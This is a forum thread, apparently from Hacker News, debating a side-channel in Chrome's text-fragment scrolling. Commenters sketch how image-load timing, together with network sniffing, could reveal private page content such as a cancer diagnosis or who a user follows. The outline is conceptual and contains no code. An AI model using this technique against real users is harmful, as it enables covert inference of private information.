Say you have a long page that lists “Pre-existing conditions” at the bottom, and near that section is also a unique image or other external asset. If you click on the link and cancer is in your list, the page will scroll and load the related assets instantly. Without cancer in your list, you’d only load those assets through human scroll, which would most likely look different timing-wise. Thus you can determine with high probability whether your target has cancer listed (if you have access to DNS records, as mentioned in the example, and the target is using a browser that delays offscreen asset loading - like this same latest Chrome).

Whereas anchors tend to be generic (#preexisting-conditions), this new scroll behavior can be used to create an existence check for any user-specific text on the page (in carefully crafted scenarios). There are probably other variations that could be devised on this concept, since it allows indirect page interaction that can bypass authorization walls (since the browser would transmit cookies normally and such).

This is absurdly difficult to pull off with very little payoff. You'd need to be sniffing the traffic of a network. Then craft a URL that contains a unique image near your text fragment query. Then somehow send that URL to the victims on your network. _Then_ check how long it takes for them to load that image upon clicking the URL.

I'd like to call myself a privacy advocate, but this is just absurd. The pros obviously outweigh the con of a very precise and targeted attack that leaks a predetermined bit of information.

If you've got their DNS records, you've already violated plenty of their privacy to get the information you want. No need for this text fragment "attack."

>I'd like to call myself a privacy advocate, but this is just absurd.

Yeah, my read of this is that it has nothing to do with privacy, people who want to block change for some reason have just learned that "i have privacy concerns about google" is a catchword that will get you some press coverage, and are essentially hijacking the actually valid and important privacy concerns to push forward their unrelated opinions (and promote their browser product).

This is my take on this, too.

As a FF user, I'd love to see FF implement this too!

FF is considering implementing something in this space, yes. Note that there are at least two proposals for how this could work: one that is already deployed via a polyfill on various sites and the Google one. They have various functionality tradeoffs, and unfortunately Google decided to make up a wholly new thing instead of improving the existing thing...

For what it’s worth, I wasn’t trying to say that this is an easy attack, just explaining the supposed outline.

Ah, and thank you for that! I had read the article a few times, but I didn't fully understand the attack until I saw your comment.

If it's https, that's all fully encrypted. The network only sees IPs. The hosts and paths are all encrypted headers.

But if it had the anchor 'cancer', couldn't you infer the same from the url alone? These examples seem highly contrived.

Anything after a hash in an URL is never sent to a server (it's only within the context of the browser).

Example from above: Twitter.com/#:~:@user

This would behave differently if the browser's user is following @user than otherwise.

This convinced me not to dismiss the issue. I'm not sure how that leaks over a side channel. But i am sure there are governments who take active measures to shape the Internet to their liking - and twitter has played a significant role in the past inside countries governed by them to oppose these governments.